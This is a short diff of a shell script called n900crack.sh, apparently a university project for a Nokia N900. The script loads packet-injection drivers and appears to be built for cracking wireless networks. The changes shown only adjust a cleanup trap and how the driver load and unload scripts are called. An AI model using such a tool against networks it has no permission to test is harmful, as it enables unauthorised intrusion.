@@ -9,7 +9,7 @@
 #Second superviser: Dr Robert Colson
 
 #traping SIGINT for clean-up after ^C exit
-trap "./n900crack-cleanup.sh" SIGINT
+trap "cd /opt/N900-crack && ./n900crack-cleanup.sh && exit" SIGINT
 
 clear
 echo "   n900crack.sh     -   by Krystian Majda   km857@live.mdx.ac.uk"
@@ -33,7 +33,7 @@ networklist=networks.txt
 
 #load injection drivers
 cd $driverdir
-sudo sh load.sh >>/dev/null 2>&1
+sudo ./load.sh >>/dev/null 2>&1
 
 #change directory to crackdir
 cd $crackdir
@@ -203,7 +203,7 @@ esac
 
 #unload the drivers
 cd $driverdir
-sudo sh unload.sh >>/dev/null 2>&1
+sudo ./unload.sh >>/dev/null 2>&1
 sleep 2
 
 exit
